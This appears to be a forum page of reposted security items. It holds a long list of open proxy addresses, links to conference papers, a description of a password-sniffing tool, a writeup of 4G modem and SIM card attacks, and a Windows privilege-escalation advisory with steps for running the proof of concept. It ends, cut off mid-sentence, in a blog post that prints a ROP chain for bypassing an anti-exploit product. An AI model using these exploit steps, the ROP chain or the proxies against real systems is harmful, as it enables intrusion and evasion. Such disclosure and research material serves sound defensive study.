190.72.45.108:9064 190.72.7.56:8080 190.73.104.85:9064 190.73.114.213:9064 190.73.115.193:9064 190.73.127.88:8080 190.73.130.219:9064 190.73.140.153:8080 190.73.143.29:8080 190.73.171.221:9064 190.73.172.251:9064 190.73.224.43:9064 190.73.251.191:8080 190.73.42.70:9064 190.73.44.57:8080 190.73.96.224:9064 190.73.98.196:8080 190.74.116.26:9064 190.74.117.103:9064 190.74.119.189:9064 190.74.195.1:9064 190.74.215.50:8080 190.74.223.165:8080 190.75.111.106:9064 190.75.114.181:9064 190.75.138.95:8080 190.75.237.50:9064 190.75.44.191:9064 190.75.47.3:8080 190.75.62.24:8080 190.75.78.168:9064 190.75.83.81:8080 190.75.86.124:8080 190.77.125.240:8080 190.77.125.66:9064 190.77.147.8:9064 190.77.167.202:9064 190.77.179.224:8080 190.77.181.187:9064 190.77.182.8:8080 190.77.185.70:9064 190.77.187.234:9064 190.77.215.152:9064 190.77.215.250:8080 190.77.221.114:8080 190.77.249.98:8080 190.77.252.118:8080 190.77.252.165:9064 190.77.30.188:9064 190.77.80.136:8080 190.77.80.79:9064 190.77.83.110:9064 190.77.83.144:8080 190.77.83.78:8080 190.78.154.143:9064 190.78.16.155:8080 190.78.161.93:9064 190.78.172.112:8080 190.78.172.31:8080 190.78.175.230:8080 190.78.177.97:9064 190.78.18.7:8080 190.78.183.52:8080 190.78.19.221:8080 190.78.190.56:8080 190.78.21.57:8080 190.78.218.44:9064 190.78.30.48:9064 190.78.51.113:8080 190.78.60.21:9064 190.78.62.131:9064 190.78.63.79:8080 190.78.79.99:9064 190.78.80.91:8080 190.78.81.248:9064 190.78.89.244:9064 190.78.90.189:8080 190.78.91.38:8080 190.78.93.215:8080 190.79.132.253:8080 190.79.153.67:9064 190.79.154.10:8080 190.79.155.196:9064 190.79.156.172:9064 190.79.158.107:8080 190.79.206.126:8080 190.79.21.146:8080 190.79.29.31:9064 190.79.44.179:9064 190.97.234.194:8080 190.97.234.52:8080 191.240.152.241:8080 192.3.91.99:8080 193.30.251.254:8080 194.106.166.1:8080 194.135.220.18:8081 195.113.196.29:80 195.246.54.7:8080 195.88.0.220:8080 197.210.252.44:80 197.210.252.44:8080 198.204.255.10:808 198.50.149.189:8888 198.71.193.136:80 198.71.196.90:80 198.81.200.145:80 198.98.103.160:3128 199.200.120.140:7808 199.200.120.140:8089 200.103.59.24:8080 200.109.131.32:9064 200.109.144.172:8080 200.109.152.249:8080 200.109.177.133:9064 200.109.181.242:9064 200.109.205.174:8080 200.109.206.89:9064 200.109.35.246:8080 200.109.45.69:8080 200.121.140.150:8080 200.214.132.19:3128 200.242.145.3:3128 200.29.67.28:80 200.46.94.202:3128 200.8.119.158:9064 200.8.217.5:9064 200.8.93.22:9064 200.84.100.78:8080 200.84.128.177:8080 200.84.133.140:9064 200.84.141.212:9064 200.84.142.210:9064 200.84.145.113:9064 200.84.149.167:8080 200.84.193.4:8080 200.84.194.29:9064 200.84.246.180:9064 200.84.251.183:9064 200.84.254.30:8080 200.84.37.124:9064 200.84.56.197:9064 200.84.68.94:9064 200.84.70.243:9064 200.84.84.219:9064 200.90.42.206:9064 200.93.109.137:8080 200.93.112.204:8080 200.93.116.106:8080 200.93.119.213:8080 200.93.13.215:8080 200.93.17.119:8080 200.93.17.16:8080 200.93.29.245:8080 200.93.31.207:9064 200.93.81.64:9064 200.99.150.70:8080 201.13.66.196:9064 201.130.171.130:8080 201.14.253.38:8080 201.159.17.228:8080 201.186.209.192:9064 201.188.22.116:9064 201.208.13.164:8080 201.208.133.19:9064 201.208.14.141:8080 201.208.143.23:8080 201.208.161.177:9064 201.208.162.225:9064 201.208.171.99:9064 201.208.178.145:3128 201.208.190.196:9064 201.208.196.109:9064 201.208.232.183:8080 201.208.37.110:9064 201.208.45.1:8080 201.209.102.216:9064 201.209.195.17:9064 201.209.199.156:9064 201.209.200.11:8080 201.209.201.173:9064 201.209.222.238:8080 201.209.232.133:8080 201.209.240.208:9064 201.209.42.1:9064 201.209.43.87:8080 201.209.67.145:9064 201.209.87.60:9064 201.209.89.82:8080 201.209.91.177:8080 201.209.98.204:8080 201.210.153.41:9064 201.210.195.140:8080 201.210.197.10:9064 201.210.206.100:8080 201.210.218.1:9064 201.210.219.243:8080 201.210.245.190:9064 201.210.255.240:8080 201.211.103.175:8080 201.211.108.172:9064 201.211.109.36:8080 201.211.117.183:9064 201.211.122.167:9064 201.211.140.90:9064 201.211.163.180:8080 201.211.192.58:8080 201.211.197.126:8080 201.211.198.238:9064 201.219.22.43:8080 201.222.55.162:8080 201.241.29.250:9064 201.242.113.156:8080 201.242.154.238:9064 201.242.155.233:9064 201.242.18.162:9064 201.242.34.76:8080 201.242.47.172:8080 201.242.78.240:9064 201.242.93.60:8080 201.243.129.66:9064 201.243.131.54:8080 201.243.137.97:9064 201.243.138.214:9064 201.243.168.219:8080 201.243.186.229:8080 201.243.194.141:8080 201.243.212.20:9064 201.243.61.122:9064 201.248.111.38:8080 201.248.237.60:9064 201.249.17.31:8080 201.39.89.51:3128 201.4.9.144:8080 201.56.148.195:3128 201.80.44.156:8080 202.106.16.36:3128 202.106.169.228:8080 202.107.233.85:8080 202.112.128.91:3128 202.118.250.234:8080 202.141.250.173:80 202.145.3.242:8080 202.151.248.22:80 202.153.130.214:80 202.161.89.198:8080 202.169.235.69:8080 202.171.253.74:82 202.171.253.74:83 202.171.253.74:85 202.171.253.84:86 202.177.238.204:9064 202.197.227.228:8088 202.22.195.86:8080 202.29.97.5:3128 202.38.95.66:8080 202.56.231.117:8080 202.62.10.178:8080 202.62.72.139:9064 202.78.233.214:9064 202.99.16.28:3128 203.144.144.162:8080 203.144.144.166:8080 203.169.246.37:3128 203.172.129.4:8080 203.176.182.101:8080 203.176.182.98:8080 203.190.116.235:9064 203.192.12.146:80 203.195.175.15:8080 203.70.253.49:9064 205.129.191.112:80 206.181.83.254:80 207.108.136.68:443 208.83.106.105:9999 209.170.151.142:7808 209.170.151.142:8089 210.14.152.91:80 210.14.152.91:8080 210.14.152.91:88 210.14.152.92:80 210.14.152.92:8080 210.14.152.92:88 210.195.43.136:3128 210.209.79.200:808 210.75.14.158:80 211.144.81.66:18000 211.144.81.66:18001 211.162.0.163:80 212.109.144.117:8080 212.200.153.157:8080 212.56.207.186:3128 212.98.72.13:80 213.141.147.193:8080 216.171.205.9:8080 216.92.112.113:80 217.112.161.16:80 217.117.6.20:8080 218.164.101.27:9064 218.164.143.112:9064 218.164.161.90:9064 218.164.72.60:9064 218.173.173.148:9064 218.201.42.115:80 218.201.42.115:8080 218.203.13.172:80 218.203.13.173:80 218.203.13.174:80 218.203.13.177:80 218.203.13.184:80 218.203.13.185:80 218.203.13.190:80 218.204.96.254:8123 218.205.229.186:3128 218.207.172.236:80 218.207.208.55:8080 218.207.29.77:8123 218.240.131.12:80 218.248.11.19:3128 218.250.124.172:9064 218.4.118.29:8118 218.44.26.122:8080 218.5.74.174:80 218.65.132.38:80 218.65.132.38:8081 218.67.42.27:18186 218.7.132.1:8080 218.76.216.56:63000 218.85.78.89:9999 218.87.111.115:8080 218.90.174.167:3128 219.134.166.18:8118 219.142.251.102:8118 219.143.84.46:9000 219.153.218.234:18186 219.217.227.93:3128 219.238.124.253:8118 219.239.227.32:3128 219.239.236.49:8888 219.246.65.143:3128 219.68.177.84:9064 219.68.55.93:9064 219.70.167.143:9064 219.84.179.66:9064 219.84.234.64:9064 219.85.104.252:9064 219.85.106.152:9064 219.85.248.97:9064 219.91.133.3:9064 219.93.183.106:8080 220.129.168.20:9064 220.129.179.238:9064 220.129.233.245:8088 220.136.12.115:9064 220.137.55.201:9064 220.141.67.102:9064 220.142.93.27:9064 220.143.168.185:9064 220.169.110.89:8080 220.169.18.69:8088 220.172.195.175:8118 220.175.89.102:18186 220.231.32.195:3128 221.10.102.199:83 221.178.30.213:8123 221.182.62.114:9999 221.182.62.115:9999 221.182.74.112:8123 221.183.16.219:80 221.221.13.124:3128 221.223.106.46:3128 221.223.40.146:9000 221.227.104.207:8118 221.238.140.164:8080 221.5.69.51:80 221.5.69.52:8085 221.7.255.173:80 222.124.176.21:8080 222.163.174.130:8585 222.182.176.62:18186 222.217.221.239:8888 222.217.221.240:8888 222.217.221.241:8888 222.219.154.112:8118 222.246.232.55:80 222.246.232.55:8101 222.73.218.43:80 222.87.129.218:80 222.87.129.218:81 222.87.129.218:82 222.87.129.218:83 222.87.129.218:843 222.88.236.236:80 222.88.236.236:82 222.88.236.236:83 222.88.236.236:843 222.94.211.50:8118 223.180.66.197:9064 223.223.134.139:9064 223.223.136.138:9064 223.239.130.15:9064 223.255.160.26:3128 223.27.234.34:8080 223.4.21.184:80 223.64.165.13:8123 223.64.182.121:8123 223.64.53.94:8123 223.66.114.191:8123 223.66.41.19:8123 223.66.73.41:8123 223.66.74.161:8123 223.67.183.80:8123 223.67.201.13:8123 223.67.210.62:8123 223.67.211.78:8123 223.67.219.109:8123 223.67.221.46:8123 223.67.229.97:8123 223.67.239.118:8123 223.67.239.132:8123 223.67.246.163:8123 223.67.246.27:8123 223.67.66.185:8123 223.82.11.159:8123 223.82.164.241:8123 223.82.167.243:8123 223.82.172.241:8123 223.82.172.29:8123 223.82.181.179:8123 223.82.203.154:8123 223.82.203.209:8123 223.82.203.210:8123 223.82.203.61:8123 223.82.204.140:8123 223.82.205.89:8123 223.82.207.89:8123 223.82.217.93:8123 223.82.222.175:8123 223.82.222.92:8123 223.82.223.230:8123 223.82.228.88:8123 223.82.235.187:8123 223.82.242.133:8123 223.82.242.200:8123 223.82.245.168:80 223.82.245.168:81 223.82.47.163:8123 223.82.68.24:8123 223.82.69.249:8123 223.82.74.23:8123 223.82.81.166:8123 223.82.82.243:8123 223.82.82.53:8123 223.82.86.6:8123 223.82.9.31:8123 223.82.91.223:8123 223.82.95.191:8123 223.83.136.163:8123 223.83.140.112:8123 223.83.141.228:8123 223.83.141.243:8123 223.83.142.77:8123 223.83.164.248:8123 223.83.186.157:8123 223.83.189.48:8123 223.83.196.118:8123 223.83.196.225:8123 223.83.196.24:8123 223.83.197.116:8123 223.83.200.106:8123 223.83.201.25:8123 223.83.203.88:8123 223.83.208.162:8123 223.83.209.128:8123 223.83.210.145:8123 223.83.210.26:8123 223.83.212.208:8123 223.83.217.91:8123 223.83.218.130:8123 223.83.218.2:8123 223.83.222.246:8123 223.83.223.24:8123 223.83.232.25:8123 223.83.233.9:8123 223.83.234.254:8123 223.83.236.134:8123 223.83.238.221:8123 223.83.26.170:8123 223.83.34.112:8123 223.83.35.80:8123 223.83.39.111:8123 223.83.39.205:8123 223.83.61.125:8123 223.83.62.112:8123 223.83.63.229:8123 223.83.77.87:8123 223.83.82.238:8123 223.83.83.169:8123 223.83.83.211:8123 223.83.83.48:8123 223.83.85.100:8123 223.83.87.148:8123 223.84.103.180:8123 223.84.106.41:8123 223.84.107.197:8123 223.84.131.82:8123 223.84.131.90:8123 223.84.132.23:8123 223.84.133.219:8123 223.84.134.75:8123 223.84.135.219:8123 223.84.137.154:8123 223.84.139.196:8123 223.84.139.89:8123 223.84.14.197:8123 223.84.140.120:8123 223.84.141.207:8123 223.84.142.188:8123 223.84.143.191:8123 223.84.144.231:8123 223.84.144.36:8123 223.84.144.90:8123 223.84.145.111:8123 223.84.145.132:8123 223.84.147.165:8123 223.84.15.51:8123 223.84.151.163:8123 223.84.155.158:8123 223.84.156.185:8123 223.84.156.192:8123 223.84.156.68:8123 223.84.157.212:8123 223.84.163.23:8123 223.84.163.71:8123 223.84.164.61:8123 223.84.167.116:8123 223.84.167.170:8123 223.84.177.158:8123 223.84.178.45:8123 223.84.179.108:8123 223.84.182.203:8123 223.84.182.42:8123 223.84.186.49:8123 223.84.187.163:8123 223.84.195.4:8123 223.84.2.112:8123 223.84.204.12:8123 223.84.204.185:8123 223.84.207.206:8123 223.84.208.147:8123 223.84.209.63:8123 223.84.21.232:8123 223.84.210.81:8123 223.84.212.214:8123 223.84.219.131:8123 223.84.219.45:8123 223.84.221.55:8123 223.84.23.41:8123 223.84.232.65:8123 223.84.235.152:8123 223.84.235.200:8123 223.84.236.3:8123 223.84.236.69:8123 223.84.237.118:8123 223.84.238.217:8123 223.84.238.73:8123 223.84.24.156:8123 223.84.241.124:8123 223.84.243.205:8123 223.84.251.12:8123 223.84.252.103:8123 223.84.252.46:8123 223.84.254.120:8123 223.84.254.170:8123 223.84.26.28:8123 223.84.27.78:8123 223.84.28.16:8123 223.84.28.162:8123 223.84.28.22:8123 223.84.28.60:8123 223.84.28.97:8123 223.84.32.141:8123 223.84.32.46:8123 223.84.32.75:8123 223.84.4.149:8123 223.84.4.206:8123 223.84.4.231:8123 223.84.46.7:8123 223.84.54.205:8123 223.84.55.38:8123 223.84.6.242:8123 223.84.6.56:8123 223.84.7.45:8123 223.84.7.58:8123 223.84.82.228:8123 223.84.95.37:8123 223.84.95.49:8123 223.85.18.138:8123 223.86.101.173:8123 223.86.116.9:8123 223.86.139.203:8123 223.86.171.18:8123 223.86.210.109:8123 223.86.210.92:8123 223.86.214.63:8123 223.86.65.10:8123 223.86.68.18:8123 223.86.79.42:8123 223.86.9.121:8123 223.87.121.85:8123 223.99.189.102:8090 23.23.204.129:3128 23.252.122.13:3128 23.88.238.46:8081 24.172.34.114:8181 27.105.22.72:9064 27.105.99.77:9064 27.131.47.131:8080 27.147.254.199:9064 27.2.132.121:9064 27.2.207.234:9064 27.3.41.167:9064 27.3.70.56:9064 27.4.247.73:9064 27.49.69.121:9064 27.5.230.20:9064 27.54.168.20:9064 27.56.190.19:9064 27.60.97.112:9064 27.63.123.201:9064 27.8.76.172:8118 31.220.48.202:52743 31.220.49.24:32523 36.224.70.91:9064 36.224.85.206:9064 36.225.215.194:8088 36.225.230.7:9064 36.225.44.232:8088 36.227.153.7:9064 36.227.164.25:9064 36.228.195.92:9064 36.229.198.77:9064 36.229.5.111:9064 36.229.53.69:9064 36.230.53.214:9064 36.230.53.65:9064 36.230.83.125:9064 36.232.196.50:9064 36.234.121.116:9064 36.234.165.50:9064 36.234.213.141:9064 36.234.34.51:9064 36.235.177.171:9064 36.235.228.71:9064 36.235.237.14:9064 36.236.204.55:9064 36.237.57.161:9064 36.239.38.215:9064 36.250.74.87:8103 36.250.74.88:80 36.68.25.230:8080 36.73.2.84:8088 36.78.130.171:8080 36.80.158.174:8088 36.86.249.28:9064 37.187.183.12:3128 37.187.3.128:80 37.187.44.205:80 37.239.46.26:80 37.34.80.223:80 37.57.39.5:8080 37.59.179.220:3128 37.59.248.3:80 41.129.224.245:8080 41.129.90.83:8080 41.188.49.159:8080 41.188.49.164:3128 41.205.14.250:8080 41.222.196.52:8080 41.223.119.156:3128 41.46.192.43:8080 41.46.197.81:8080 41.72.105.38:3128 41.86.25.158:8080 41.89.96.43:3128 42.235.57.54:8585 42.237.92.110:8585 42.249.225.167:8585 46.19.143.253:8888 46.19.231.190:8080 46.24.18.4:8080 46.4.152.218:8080 46.8.23.12:3128 49.158.16.114:9064 49.204.115.34:9064 49.204.162.209:9064 49.205.125.86:9064 49.205.166.210:9064 49.205.218.212:9064 49.205.227.239:9064 49.205.24.198:9064 49.205.77.161:9064 49.205.84.110:9064 49.205.86.55:9064 49.206.12.251:9064 49.206.127.142:9064 49.206.135.142:9064 49.206.181.139:9064 49.207.196.241:9064 49.207.243.52:9064 49.207.249.46:9064 49.207.35.91:9064 49.207.53.171:9064 49.207.67.140:9064 49.207.9.198:9064 5.135.6.168:7808 5.135.6.168:8089 5.152.233.9:8080 5.206.235.28:8080 5.56.61.26:19350 54.169.185.18:8080 54.169.73.201:80 54.174.7.147:3128 54.174.83.182:3128 54.211.2.150:3128 54.223.159.87:3128 54.254.102.180:3128 54.81.39.56:60884 54.81.39.56:64028 54.86.216.36:3128 58.11.3.58:3128 58.115.16.5:9064 58.119.86.221:3128 58.180.17.112:8080 58.213.19.134:2311 58.215.36.102:80 58.215.36.104:80 58.246.199.122:3128 58.251.78.71:8088 58.253.238.242:80 58.253.238.243:80 58.64.158.220:8088 58.96.184.3:3128 59.104.195.66:9064 59.115.147.30:9064 59.115.224.182:9064 59.151.103.15:80 59.161.178.160:9064 59.161.180.134:9064 59.37.126.26:8088 59.38.32.35:1111 59.67.153.132:8118 59.67.83.56:8118 59.75.223.45:8118 59.88.24.35:9064 59.91.135.4:9064 59.92.112.59:9064 59.92.64.24:9064 59.93.135.246:9064 59.93.40.163:9064 59.94.109.90:9064 59.95.231.167:9064 59.95.5.209:9064 60.185.207.157:8585 60.194.67.254:8118 60.206.153.177:8118 60.207.166.152:80 60.217.242.157:80 60.244.55.78:9064 60.26.64.134:8118 61.0.202.77:9064 61.135.137.49:9000 61.158.173.188:9999 61.163.17.158:9999 61.176.62.82:8118 61.184.192.42:80 61.194.40.85:8080 61.223.226.53:9064 61.223.232.144:9064 61.224.211.177:9064 61.224.66.87:9064 61.224.71.210:9064 61.227.126.218:9064 61.227.212.176:9064 61.228.146.145:9064 61.228.151.14:9064 61.228.175.140:8088 61.228.240.57:8088 61.230.183.46:8088 61.230.193.203:9064 61.230.44.216:9064 61.31.171.125:9064 61.51.144.136:8118 61.52.100.107:8118 61.52.21.127:18186 61.52.68.141:8118 61.53.143.179:80 61.58.170.203:9064 61.60.218.5:9064 61.63.122.109:9064 61.90.67.222:8080 61.91.251.4:8080 62.103.107.9:80 62.75.229.121:3128 64.31.22.131:7808 64.31.22.131:8089 65.164.148.66:80 69.10.137.139:8000 69.197.148.18:7808 69.197.148.18:8089 74.50.126.248:7808 74.50.126.248:8089 74.50.126.249:7808 74.50.126.249:8089 75.102.129.2:8080 75.148.236.49:3128 77.120.102.5:8080 77.120.102.6:8080 77.81.105.147:7808 77.81.105.147:8089 77.81.246.89:3128 80.152.195.199:8080 82.114.78.105:8080 82.117.163.74:8080 82.209.199.214:8080 83.64.150.22:8080 87.251.177.210:3128 88.159.140.239:80 89.132.187.153:8080 89.26.71.134:8080 Sursa: 31-12-14 | Fast Proxy Server List (3479) - Pastebin.com

Exploiting Fundamental Weaknesses in Botnet Command and Control (C&C) Panels What Goes Around Comes Back Around ! Aditya K Sood BlackHat Security Conference Las Vegas, USA, 2014 Version 1.1 Abstract This research is primarily focused on the use of penetration testing approach to nd fundamental weaknesses and conguration aws re-siding in Command and Control (C&C) panels used by bot herders to manage botnets. This paper generalizes the ndings that have been noticed during testing and analysis of several C&C panels. Download: http://www.secniche.org/blackhat-2014/blackhat_2014_briefings_whitepaper_exp_cc_flaws_adityaks.pdf

Intel ME Secrets Hidden code in your chipset and how to discover what exactly it does Igor Skochinsky Hex-Rays RECON 2014 Montreal High-level overview of the ME Low-level details ME security and attacks Dynamic Application Loader Results Future work Download: http://recon.cx/2014/slides/Recon%202014%20Skochinsky.pdf

[h=2]SniffPass – Simple Password Sniffer[/h] SniffPass is small password monitoring software (basically a password sniffer) that listens to your network, capture the passwords that pass through your network adapter, and display them on the screen instantly. SniffPass can capture the passwords of the following Protocols: POP3, IMAP4, SMTP, FTP, and HTTP (basic authentication passwords). You can use this utility to recover lost Web/FTP/Email passwords via your own network adapter. [h=2]Requirements[/h] SniffPass can capture passwords on any 32-bit Windows operating system (Windows 98/ME/NT/2000/XP/2003/Vista) as long as WinPcap capture driver is installed and works properly with your network adapter. You can also use SniffPass with the capture driver of Microsoft Network Monitor, if it’s installed on your system. Under Windows 2000/XP (or greater), SniffPass also allows you to capture TCP/IP packets without installing any capture driver, by using ‘Raw Sockets’ method. However, this capture method has the following limitation: On Windows XP/SP1 passwords cannot be captured at all – Thanks to Microsoft’s bug that appeared in SP1 update… On Windows Vista with SP1, only UDP packets are captured. TCP packets are not captured at all. On Windows 7, it seems that ‘Raw Sockets’ method works properly again, at least for now… Do note, this software is NOT designed to grab passwords from other machines on the network, and could do so but only if the computers were connected via a simple hub or unecrypted Wireless networks. You can download SniffPass v1.13 here: sniffpass.zip Or read more here. Sursa: SniffPass - Simple Password Sniffer - Darknet - The Darkside

[h=3]4G Security: Hacking USB Modem and SIM Card via SMS[/h] Telecommunications operators are pushing fast and cheap 4G communications technology. Yet only the chosen few know just how insecure it is. While researching the security level of 4G communications, Positive Technologies experts managed to uncover USB modem vulnerabilities that allow a potential attacker to gain full control of the connected computer as well as to access a subscriber account on a mobile operator portal. Additionally, attacks on a SIM card using a binary SMS allow an intruder to sniff and decrypt traffic or lock the SIM. The team presented their reports on the topic at the PacSec 2014 (Tokyo) and the 31C3 (Hamburg). In this article, we will give you the digest of this research conducted by Sergey Gordeychik, Alexander Zaitsev, Kirill Nesterov, Alexey Osipov, Timur Yunusov, Dmitry Sklyarov, Gleb Gritsai, Dmitry Kurbatov, Sergey Puzankov, and Pavel Novikov. First, we would like to say a couple of words about the main purpose of the research. It is not only the matter of security for trendy smartphones that we use to read news feed in social networks. Multiple critical infrastructures including industrial control systems (SCADA) also implement digital mobile communication based on the GSM standard. Another example from everyday life is having your money stolen from bank accounts. No one would like to become a victim of that. Yet you might have seen small antenna on ATMs. Yes, it is also GSM. A modern wireless modem is a computer that uses a well-known OS (usually Linux or Android) and a number of multifunctional applications. The software and data transfer protocols contain some vulnerabilities that attackers have successfully exploited in the last several years, say, to unlock a modem or to unbind it from the operator. To solve the problem in one blow, many services got transferred to the web. Yet it resulted in even more vulnerabilities. For the research purposes, we used 6 different series of USB modems with 30 different firmware versions. Only 3 firmwares proved to be hack-resistant. What did we manage to do to the rest of them? First, we identified the gear. The documentation and search engines helped us with that. In some cases Google was even more useful: it gave us the password for Telnet access. However, for external communications we need http, not Telnet. Just connect the modem to a computer and manage it as a separate network node with web applications. It gives you the opportunity to launch an attack via a browser (CSRF, XSS, RCE). This way you will force the modem to give out a lot of useful information about itself. Besides obtaining data, we may use the modem to do the following: change DNS settings (to sniff traffic), change SMS center settings (to intercept and interfere with SMS), change the password on the self-service portal by sending an SMS (to transfer money by subscribing to a third-party service), lock the modem by deliberately entering wrong PIN or PUK codes, remotely "update" the modem's firmware to a vulnerable version. You may advance your attack even further by accessing the computer connected to the hacked modem. One way to do it is to install a USB keyboard driver, which causes the computer to identify the modem as an input device. Use this pseudo keyboard to issue the command to reboot the system from an external disk, aka the very same modem. Then all that is left to do is to install a bootkit that allows you to remotely control the device. You may check out the video for visual evidence: The best countermeasure any ordinary user should take is stop inserting this and that into your USB ports. By "this and that" we also mean innocent-looking USB modems that appear to be such small and harmless communication devices. We dedicated the second part of our research to SIM cards. The fact that a SIM card is a computer with an OS, file system, and multifunctional applications was proven long ago. As the German cryptographer Karsten Nohl demonstrated at the Positive Hack Days conference, SIM applications (TARs) are protected in different ways. Some you may hack by brute-forcing DES keys. Some respond to an external command without any protection whatsoever and may give out a lot of sensitive information. To brute-force DES keys, we use a set of field-programmable gate arrays (FPGA), which became trendy for Bitcoin mining a couple of years ago and got cheaper after the hype was over. The speed of our 8 modules *ZTEX 1.15y board with the price tag of 2,000 Euro is 245.760 Mcrypt/sec. It is enough to obtain the key within 3 days. Then we may easily issue commands to well-known TARs and manage them; e.g. Card Manager allows installing a Java application to the SIM. Another curious TAR is a file system that stores TMSI (Temporary Mobile Subscriber Identity) and Kc (Ciphering Key). We may perform the following actions via a binary SMS: decrypt subscriber traffic without using brute force attacks on DES, spoof a subscriber's identity (receive his/her calls and SMS), track a subscriber's whereabouts, cause DOS by entering 3 wrong PIN codes and 10 wrong PUK codes in a row if PIN code is enabled for file system protection. It’s worth to note that the attack described above could successfully circumvent not only A5/1 (the most commonly used cellphone encryption algorithm for 2G networks), but also the stronger versions of encryption used in 3G and 4G. In conclusion, let us look at basic statistics. We used more than 100 SIM cards of different origin for the research, around 20% of those have vulnerabilities mentioned earlier, which means every fifth SIM card is flawed. Even so, it is hard to give any security advice to end users. These attacks are mostly targeting basic technological level vulnerabilities, and it is manufactures and telcos' task to fix them. The world press has already described this research as "SMS pwnage on MEELLIONS of flawed SIM cards, popular 4G modems". ?????: Positive Research ?? 11:26 PM Sursa: Positive Research Center: 4G Security: Hacking USB Modem and SIM Card via SMS

Windows: Elevation of Privilege in ahcache.sys/NtApphelpCacheControl Platform: Windows 8.1 Update 32/64 bit (No other OS tested) On Windows 8.1 update the system call NtApphelpCacheControl (the code is actually in ahcache.sys) allows application compatibility data to be cached for quick reuse when new processes are created. A normal user can query the cache but cannot add new cached entries as the operation is restricted to administrators. This is checked in the function AhcVerifyAdminContext. This function has a vulnerability where it doesn't correctly check the impersonation token of the caller to determine if the user is an administrator. It reads the caller's impersonation token using PsReferenceImpersonationToken and then does a comparison between the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level of the token so it's possible to get an identify token on your thread from a local system process and bypass this check. For this purpose the PoC abuses the BITS service and COM to get the impersonation token but there are probably other ways. It is just then a case of finding a way to exploit the vulnerability. In the PoC a cache entry is made for an UAC auto-elevate executable (say ComputerDefaults.exe) and sets up the cache to point to the app compat entry for regsvr32 which forces a RedirectExe shim to reload regsvr32.exe. However any executable could be used, the trick would be finding a suitable pre-existing app compat configuration to abuse. It's unclear if Windows 7 is vulnerable as the code path for update has a TCB privilege check on it (although it looks like depending on the flags this might be bypassable). No effort has been made to verify it on Windows 7. NOTE: This is not a bug in UAC, it is just using UAC auto elevation for demonstration purposes. The PoC has been tested on Windows 8.1 update, both 32 bit and 64 bit versions. I'd recommend running on 32 bit just to be sure. To verify perform the following steps: 1) Put the AppCompatCache.exe and Testdll.dll on disk 2) Ensure that UAC is enabled, the current user is a split-token admin and the UAC setting is the default (no prompt for specific executables). 3) Execute AppCompatCache from the command prompt with the command line "AppCompatCache.exe c:\windows\system32\ComputerDefaults.exe testdll.dll". 4) If successful then the calculator should appear running as an administrator. If it doesn't work first time (and you get the ComputerDefaults program) re-run the exploit from 3, there seems to be a caching/timing issue sometimes on first run. This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public. [TABLE] [TR] [TD] [/TD] [TD] poc.zip 110 KB Download[/TD] [/TR] [/TABLE] Sursa: https://code.google.com/p/google-security-research/issues/detail?id=118#c3

[h=3]MBAE (Malware Bytes Anti Exploit) Disarm[/h] Not very long ago, security industry shifted from malwares to exploits. Though malware industry still dominates the market due to its sophistication and reach, exploits are nothing but the new sexy. Just like in old days antivirus were starting up, exploit detection systems are increasing nowadays and malware enthusiasts are shifting towards this trend. Exploits can get you more money, much much more than what malware authors get by selling their creations. Not to mention the fame that goes with exploit development (automatically being a whitehat, if you disclosed a 0day responsibly or not) is also more in quantity and won't feel embarrassing to tell others as compared to a malware author. While malware authors are always considered blackhats, exploit authors are born whitehats even though they do shady business. =) Market trend gave away the two most used exploit detection free toolkits 1. EMET 2. MBAE And despite the false positives and fake alerts, they both pack quite a punch. After searching a while i found an article from offensive security which claimed to bypass EMET successfully. Though the method they used was out of the box, EMET doesn't get updated that regularly so its fine i guess. EMET disarming By OffSec TLDR: The logic behind this attack was a global switch which can be used to protect & unprotect applications. If you alter it, all protections go kaputt. In this blogpost i will be covering something similar to bypass all of MBAE's checks. [h=3]Epilogue[/h] for the sake of reader i have already hosted the POC of mbae bypass at my Github Acc POC: Github Note: i have modified a POC i got from a public forum, and simply added Rop Gadgets. [h=3]Prologue[/h] Kafeine had done quite a piece on malware bytes making them seem like a very different company offering a unique product. malware.dontneedcoffee [h=3]Story[/h] So i got my hands on MBAE. Pretty nice UI ima. Unlike most exploit authors, instead of working on a public heap corruption exploit i tried to execute my favourite and oldest exploit. The very first i ever laid my hands on, CVE-2010-3333. With html based exploits we have few advantages: 1. we can use DOM to check for presence of specific dll's (for detection of EMET or MBAE) 2. If we leverage information leak vuln, we can build a rop chain with static offsets from inside dll memory in runtime. 3. we can place strings on heap and address it, by relying on deterministic nature of heap. Thus planting strings in ROP gets easy (as done by offsec in their disarming EMET article) But in StackOverflows, only thing we have is EIP and 1 looooong ROP chain. However good for us, CVE-2010-3333 works on Windows XP-7 without ROP. On windows 8, DEP is enforced so it crashes. Nevertheless we will circumvent all that later. so i searched google for some public exploit POC, and i found one at a random forum. moment i executed that sample, MBAE caught it. Upon investigation i found out that MBAE was enforcing DEP in all processes it protected. Thus from XP-7 we cannot execute this exploit without ROP. So i went ahead and asked mona to generate a Rop Chain for VirtualProtect. Appending rop gadgets 0x78833e3c, # POP EAX # RETN 0x788011c0, # ptr to VirtualProtect() 0x788b53d1, # MOV EAX,DWORD PTR DS:[EAX] # RETN 0x788e4a48, # XCHG EAX,ESI # RETN 0x78832a79, # POP EBX # RETN 0x00000201, # 0x00000201-> ebx 0x7880a254, # POP EDX # RETN 0x00000040, # 0x00000040-> edx 0x78854775, # POP EBP # RETN 0x788b7b2b, # jmp esp 0x7889363e, # POP ECX # RETN 0x78922ad5, # &Writable location msxml5.dll 0x788fad49, # POP EDI # RETN 0x788880d4, # RETN (ROP NOP) 0x78833e3c, # POP EAX # RETN 0x90909090, # nop 0x788172ee, # PUSHAD # RETN The final exploit should work in Enforced DEP. However i was greeted by following upon detonation. Time to open the box VirtualProtect Seems Hooked Nothing useful inside first routine Interesting stuff VirtualProtect seems protected by CallPrecedenceCheck from RopGuard RopGuard_RopCheck - Ivan Fratric Moving on after checking is performed forward jump Actual Routine Prologue The automated systems i have seen by now perform nested hook filtering, meaning if they caught Kernelbase!VirtualProtect() they will skip Kernelbase!VirtualProtectEx() & Ntdll!ZwProtectVirtualMemory(). So it seems MBAE has only 1 protection which detects if return address was preceded by a call instruction. Lets see whats inside that protection then we can try to circumvent it. I was surprised to see this code, judging by the look it seems the developers of this tool quite 'literally' copied the code from RopGuard. When i say quite literally i do mean literally, because apparently they dont know what this code does. Allow me to give an insight return address - 3 is compared to 0xE8 (opcode for 16bit call instruction) if its equal then return a value which corresponds to legitimate reply. return address - 5 is compared to 0xE8 (opcode for 32bit call instruction) if its equal then return a value which corresponds to 